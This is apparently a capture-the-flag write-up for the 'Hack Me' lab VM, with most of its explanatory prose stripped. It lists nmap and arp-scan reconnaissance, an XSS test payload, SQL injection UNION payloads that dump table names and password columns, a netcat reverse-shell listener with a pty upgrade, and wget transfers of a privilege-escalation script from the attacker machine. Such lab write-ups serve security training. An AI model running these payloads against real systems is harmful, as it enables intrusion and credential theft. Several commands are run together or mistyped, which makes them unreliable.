Hack Me CTF Write-Up

Overview

Getting Started

root@kali$ arp-scan -l

Port and Service Enumeration

root@kali$ nmap 192.168.8.129

Web Application Testing

<script>alert("XSS")</script> ' or 1=1 limit 1;#

SQL Injection

' or 1=1 limit2;#
' or 1=1 UNION SELECT 1;# ' or 1=1 UNION SELECT 1,2;# ' or 1=1 UNION SELECT 1,2,3;# ' or 1=1 UNION SELECT 1,2,3,4;#
# database user permission ' or 1=1 UNION SELECT 1,user(),3;# # database version ' or 1=1 UNION SELECT 1,@@version,3;# # database type ' or 1=1 UNION SELECT 1, database(),3;# # table names ' or 1=1 UNION SELECT 1,group_concat(TABLE_NAME,0x0a),3 from information_schema.tables where table_schema=database();# # columns in user table ' or 1=1 UNION SELECT 1,group_concat(column_name,0x0a),3 from information_schema.columns where table_name='users';#
or 1=1 UNION SELECT 1,group_concat(name,0x0a,password ),3 from information_schema.tables where table_name='users';#

Hash Cracking

root@kali$ hash-identifier
root@kali$ nc -nlvp 4447
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin export TERM=xterm export SHELL=bash python -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation

root@kali$ cp unix-privesc-check /var/www/html
root@kali$ service apache2 start
www-data@hackme$ wget http://192.168.8.128/unix-privesc-check
www-data@hackme$ wget www-datawww-data@hackme$ chmod 777 Unix-privesc-check www-data@hackme$ ./Unix-privesc-check
www-data@hackme$ cp touchmenot /var/www/htmlroot@kali$ wget http://92.168.8.129/touchmenot
root@kali$ binwalk touchmenot

--

--

🎓 M.A. Candidate @GeorgetownCSS Tech/Security/Eastern Europe | Adversary Simulation and Penetration Testing @Deloitte | 🥍 @PennStateMLax Alum

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Tyler Butler

🎓 M.A. Candidate @GeorgetownCSS Tech/Security/Eastern Europe | Adversary Simulation and Penetration Testing @Deloitte | 🥍 @PennStateMLax Alum